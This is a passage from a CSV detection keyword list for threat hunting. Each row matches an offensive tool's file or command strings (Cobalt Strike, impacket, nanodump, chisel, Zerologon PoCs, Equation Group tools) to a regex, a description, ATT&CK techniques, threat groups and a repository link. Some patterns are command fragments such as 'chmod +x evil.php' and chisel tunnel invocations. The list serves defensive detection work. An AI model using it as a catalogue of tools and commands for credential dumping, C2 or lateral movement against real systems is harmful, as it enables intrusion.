- T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*changepasswd.py*",".{0,1000}changepasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*change-windows10-mac-address.py*",".{0,1000}change\-windows10\-mac\-address\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*chaos*persistence_enable*",".{0,1000}chaos.{0,1000}persistence_enable.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*charlesnathansmith/whatlicense*",".{0,1000}charlesnathansmith\/whatlicense.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*charles-proxy*",".{0,1000}charles\-proxy.{0,1000}","offensive_tool_keyword","charles-proxy","A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic","T1043.002 - T1556.001 - T1573.001","TA0012 - TA0017","N/A","N/A","Sniffing & 
Spoofing","https://charlesproxy.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*charlotte-main.zip*",".{0,1000}charlotte\-main\.zip.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*ChatLadon.exe*",".{0,1000}ChatLadon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*ChatLadon.rar*",".{0,1000}ChatLadon\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*chaudharyarjun/LooneyPwner*",".{0,1000}chaudharyarjun\/LooneyPwner.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","1","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*check that our dll as been injected : NTHASH*",".{0,1000}check\sthat\sour\sdll\sas\sbeen\sinjected\s\:\sNTHASH.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential 
Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*check_all*.c*",".{0,1000}check_all.{0,1000}\.c.{0,1000}","offensive_tool_keyword","CheckPlease","c project from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_all*.go*",".{0,1000}check_all.{0,1000}\.go.{0,1000}","offensive_tool_keyword","CheckPlease","go script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_all*.pl*",".{0,1000}check_all.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","CheckPlease","perl script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_all*.ps1*",".{0,1000}check_all.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","CheckPlease","ps1 script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. 
and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_all*.py*",".{0,1000}check_all.{0,1000}\.py.{0,1000}","offensive_tool_keyword","CheckPlease","python script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_and_write_IAT_Hook*",".{0,1000}check_and_write_IAT_Hook.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda 
- Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*check_cve-2020-1472.py*",".{0,1000}check_cve\-2020\-1472\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WiIs0n/Zerologon_CVE-2020-1472","1","1","N/A","N/A","1","11","5","2020-10-05T07:47:02Z","2020-09-29T18:45:44Z" "*check_function ntdll.dll EtwEventWrite*",".{0,1000}check_function\sntdll\.dll\sEtwEventWrite.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*check_ppl_requirements*",".{0,1000}check_ppl_requirements.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*check_sudo_nopasswd_binaries(*",".{0,1000}check_sudo_nopasswd_binaries\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*checkIfHiddenAPICall*",".{0,1000}checkIfHiddenAPICall.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" 
"*Check-LocalAdminHash.ps1*",".{0,1000}Check\-LocalAdminHash\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*CheckPlease*",".{0,1000}CheckPlease.{0,1000}","offensive_tool_keyword","CheckPlease","This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads.","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*CheckPort.csproj*",".{0,1000}CheckPort\.csproj.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*CheeseDCOM.exe*",".{0,1000}CheeseDCOM\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseExec.csproj*",".{0,1000}CheeseExec\.csproj.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseExec.exe*",".{0,1000}CheeseExec\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheesePS.csproj*",".{0,1000}CheesePS\.csproj.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheesePS.exe*",".{0,1000}CheesePS\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code 
Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseRDP.exe*",".{0,1000}CheeseRDP\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseSQL.exe*",".{0,1000}CheeseSQL\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseTools.sln*",".{0,1000}CheeseTools\.sln.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseTools-master*",".{0,1000}CheeseTools\-master.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*cheetah.py -*",".{0,1000}cheetah\.py\s\-.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*chenjiandongx/sniffer*",".{0,1000}chenjiandongx\/sniffer.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","8","709","63","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z" "*Chimera-main.zip*",".{0,1000}Chimera\-main\.zip.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*Chimera-master.zip*",".{0,1000}Chimera\-master\.zip.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*chisel -*",".{0,1000}chisel\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel client -*",".{0,1000}chisel\sclient\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel client 
http*",".{0,1000}chisel\sclient\shttp.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel server -*",".{0,1000}chisel\sserver\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel.exe *",".{0,1000}chisel\.exe\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*chisel.exe client*",".{0,1000}chisel\.exe\sclient.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel.exe server*",".{0,1000}chisel\.exe\sserver.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel.jpillora.com*",".{0,1000}chisel\.jpillora\.com.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel_1*_darwin_*.gz*",".{0,1000}chisel_1.{0,1000}_darwin_.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel_1*_linux_*.gz*",".{0,1000}chisel_1.{0,1000}_linux_.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel_linux_amd64*",".{0,1000}chisel_linux_amd64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel_windows_amd64.exe*",".{0,1000}chisel_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel-master.zip*",".{0,1000}chisel\-master\.zip.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chknull.zip*",".{0,1000}chknull\.zip.{0,1000}","offensive_tool_keyword","ChkNull","Checks for Users with No passwords","T1078 - 
T1201","TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" "*chmod +x dirty*",".{0,1000}chmod\s\+x\sdirty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","1","45","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*chmod +x evil.php*",".{0,1000}chmod\s\+x\sevil\.php.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*chmod 666 /var/run/utmp~*",".{0,1000}chmod\s666\s\/var\/run\/utmp\~.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*chmod 700 lse.sh*",".{0,1000}chmod\s700\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*chmod 700 nscd crond*",".{0,1000}chmod\s700\snscd\scrond.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection","T1053 - T1064 - T1059 - T1218","TA0002 - 
TA0007","N/A","N/A","Shell spawning","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON","1","0","N/A","N/A","1","0","1","2017-11-12T08:13:06Z","2017-11-12T08:10:08Z" "*chmod 755 lse.sh*",".{0,1000}chmod\s755\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*choco install * common.fireeye*",".{0,1000}choco\sinstall\s.{0,1000}\scommon\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation 